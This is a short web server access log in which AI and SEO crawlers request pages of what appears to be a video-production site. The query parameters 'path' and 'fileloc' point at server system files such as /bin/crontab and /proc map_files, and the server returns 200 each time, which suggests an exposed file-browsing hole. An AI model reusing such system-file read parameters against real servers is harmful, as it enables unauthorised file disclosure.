216.73.216.182 - - [05/Nov/2025:00:09:23 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fcrontab&path=%2F%2Fbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:23 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Ffactor&path=%2F%2Fbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:23 +0000] "GET /our-works/phim-viral-nestle?path=%2Fvar%2Fsnap%2Fcore20 HTTP/1.0" 200 3248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
217.113.194.38 - - [05/Nov/2025:00:09:23 +0000] "GET /our-works/mv-han-sara/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
216.73.216.182 - - [05/Nov/2025:00:09:23 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fntfscluster&path=%2F%2Fbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:23 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F794%2Fmap_files HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fbatch&path=%2F%2Fbin HTTP/1.0" 200 2913 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fprintf&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:09:24 +0000] "GET /q-~265UGRlQF9rLje52iqrcWOFaWxUCfIvAn33052/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:09:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fvdir&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Ftraceroute6&path=%2F%2Fbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fntfstruncate&path=%2F%2Fbin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
